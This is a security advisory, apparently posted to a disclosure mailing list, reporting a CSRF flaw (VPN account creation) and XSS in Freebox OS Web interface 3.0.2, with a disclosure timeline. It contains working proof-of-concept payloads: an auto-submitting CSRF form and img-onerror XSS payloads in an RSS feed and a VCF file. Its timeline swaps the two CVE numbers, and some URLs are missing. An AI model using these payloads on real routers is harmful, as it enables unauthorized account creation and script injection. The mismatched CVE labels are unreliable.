Freebox OS Web interface 3.0.2 XSS, CSRF

Subject: Freebox OS Web interface 3.0.2 XSS, CSRF

Hello list, 

Here are two CVEs I reported to Freebox, a french ISP:
 - CVE-2014-9382 - CSRF in VPN user account creation
 - CVE-2014-9405 - XSS

Vulnerable product: Freebox OS Web interface 3.0.2.

CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation
Risk level: High

Freebox allows users to create VPN connections to their home network. 

In version 3.0.2 when a new user is created, the following JSON request is sent to


This request is vulnerable to CSRF which is easy to trigger.

The following POC would create a new VPN account "ngocdh" / "1234=5678":

  <body onload=vpn.submit()>
    <form name="vpn" action="" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;login&quot;&#58;&quot;ngocdh&quot;&#44;&quot;password&#95;set&quot;&#58;false&#44;&quot;ip&#95;reservation&quot;&#58;&quot;&quot;&#44;&quot;password&quot;&#58;&quot;1234" value="5678&quot;&#125;" />
      <input type="submit" value="Submit request" />

CVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2
Risk level: low

Two XSS instances with low probability of exploitation were found in the following places:
- Download RSS
- Contacts

The following POC demonstrates the XSS in the "description" field of a Download RSS item:

<rss version="2.0" xmlns:atom="">
<title>From Huy Ngoc</title>
<atom:link rel="hub" href=""/>
<atom:link rel="self" href=""/>
        <title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description>
        <pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate>

In order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed.

The following VCF file demonstrates a XSS exploitation POC, "alert(document.domain)" would be called after importing this VCF file from the web interface:

FN:DAU Huy Ngoc
URL:<img src=/ onerror='alert(document.domain);'>

In order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf.

21/11/2014: XSS CVE-2014-9382 is reported to vendor
21/11/2014: vendor confirmed the vulnerability
02/12/2014: CSRF CVE-2014-9405 is reported to vendor
06/12/2014: a hot fix is released (

Credit: DAU Huy Ngoc (@ngocdh)

Copyright © 1995-2020 All rights reserved.